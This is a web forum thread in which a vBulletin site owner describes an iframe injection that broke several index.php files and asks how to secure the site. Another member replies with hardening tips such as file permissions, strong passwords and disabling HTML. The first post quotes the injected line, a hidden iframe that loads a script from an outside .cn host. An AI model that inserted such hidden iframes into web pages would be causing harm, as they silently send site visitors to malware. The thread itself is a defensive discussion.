iframe injection attacks

Ben10

New Member
Hello

I am creating this thread to awareness about "iframe injection attack" .
I face this attach today and i also create a thread http://www.vbteam.info/how/24123-parse-error.html where " bluescorpion " help me .
now i want to learn how can we secure our site from this attack .when my forum attacked i got these errors
In Index.php
Parse error: syntax error, unexpected '<' in /home/*******/public_html/index.php on line 585
In Admincp index.php
Parse error: syntax error, unexpected $end, expecting ',' or ';' in /home/*******/public_html/admincp/index.php on line 1123
also get error in archive "Index.php"
In gallery index.php
Parse error: syntax error, unexpected '<', expecting T_VARIABLE or '$' in /home/******/public_html/gallery/index.php on line 423
also get an error in arcade index.php

when i open the the index.php and on line 585 i see this
Code:
<iframe src="http://thelotmachine.cn:8080/ts/in.cgi?pepsi49" width=125 height=125 style="visibility: hidden"></iframe>
there is no other line after this

So share your experiences and solutions to secure the forum from these attacks.

Regards
Ben
 

Grinderhand

New Member
Use strong passwords for yourself and your assistant admins/mods.

Check your file/folder permissions. Files - 644, folders - 755.

Rename your admincp/modcp folders to something else and reflect these changes in your config.php.

Password protect your admincp/modcp folders using .htaccess with strong passwords.

Choose your staff carefully. If you don't know them well enough to trust them with your possessions ...

Make sure you are updated to the latest version possible.

Delete your /install directory entirely. You don't need anything in there.

If you ever needed to use ANYTHING from the do_not_upload folder in your vB installation archive to fix a problem on your forum, make sure you have deleted it when finished. MAJOR SECURITY HOLE if you don't.

Use strong passwords for your FTP access.

If you have removed any mods, make sure to remove all files uploaded in association with those mods.

NEVER allow HTML in posts, PMs or sigs.

NEVER make a backup of your database anywhere in public_html or below. If you must make a backup, make sure it's somewhere above your webroot.

Make sure you do frequent virus/trojan scans of your own computer and require the same of your staff. After all, this is the machine you use to access your forum's inner workings.

Follow these guidelines and you'll be much safer and happier.
 

Ben10

New Member
hmmm my file permission is 755 .
is there any problem occur when i change all the file permission to 644 ?
 

Ben10

New Member
Grinderhand said:
Files should all be set to 644 - no exceptions. If yours are 755 that may be why you got file injections.

Thanks bro i am going to do this. means all the files which are in the public_html should be in 644 ?
 

Grinderhand

New Member
ALL files in EVERY directory AND subdirectory below public_html. Best advise is to CHMOD EVERYTHING in public_html and below to 644 then go back and CHMOD the folders only to 755 as there are fewer of them.

One note: If you have attachments moved out of the database and into the file system, that folder MUST be CHMODed to 777 so they can be written to, so make sure your attachments folder is above public_html. If it isn't now, change it and move all your attachments there. Same advice goes for user album pics and avatars. If you are storing everything in the database, ignore this note.
 

Ben10

New Member
Grinderhand said:
ALL files in EVERY directory AND subdirectory below public_html. Best advise is to CHMOD EVERYTHING in public_html and below to 644 then go back and CHMOD the folders only to 755 as there are fewer of them.

One note: If you have attachments moved out of the database and into the file system, that folder MUST be CHMODed to 777 so they can be writte to, so make sure your attachments folder is above public_html. If it isn't now, change it and move all your attachments there. Same advice goes for user album pics and avatars. If you are storing everything in the database, ignore this note.

thanks alot bro for this very nice clearance .i am going to to this as your advise thanks again if i have any further question i must ask to you :p
 
Top